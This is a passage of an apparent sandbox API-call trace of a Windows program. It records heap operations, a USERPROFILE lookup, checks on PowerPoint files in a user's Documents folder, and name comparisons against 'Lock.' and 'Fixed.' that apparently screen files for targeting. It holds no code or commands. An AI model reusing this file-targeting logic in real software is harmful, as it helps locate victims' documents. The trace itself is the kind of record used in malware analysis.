0x24aa110 [0266.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0266.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.173] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0266.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f2068 [0266.175] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/rq5tKC1of8p4r7HR.pps", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rq5tKC1of8p4r7HR.pps", lpFilePart=0x8bf658*="rq5tKC1of8p4r7HR.pps") returned 0x3c [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0266.175] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rq5tKC1of8p4r7HR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rq5tkc1of8p4r7hr.pps")) returned 0xffffffff [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.176] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0266.176] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.176] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0266.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XeFrXnKCfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eFrXnKCfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FrXnKCfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rXnKCfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnKCfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nKCfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KCfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CfR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fR10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="10wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wVvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VvY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vY0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.178] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XeFrXnKCfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eFrXnKCfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FrXnKCfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rXnKCfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnKCfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nKCfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KCfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CfR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fR10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="10wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wVvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VvY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vY0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.179] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0266.179] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0266.179] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.179] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0266.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.180] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0266.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.180] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.180] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/XeFrXnKCfR10wVvY0.pptx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d5280d0, ftCreationTime.dwHighDateTime=0x1d4e9af, ftLastAccessTime.dwLowDateTime=0x3af8fd50, ftLastAccessTime.dwHighDateTime=0x1d4e5b3, ftLastWriteTime.dwLowDateTime=0x3af8fd50, ftLastWriteTime.dwHighDateTime=0x1d4e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x44ea, dwReserved0=0xb330047, dwReserved1=0x29760, cFileName="XeFrXnKCfR10wVvY0.pptx", cAlternateFileName="XEFRXN~1.PPT")) returned 0xaa5820 [0266.181] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.181] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0266.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.183] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.184] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0266.184] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0266.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.184] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.185] 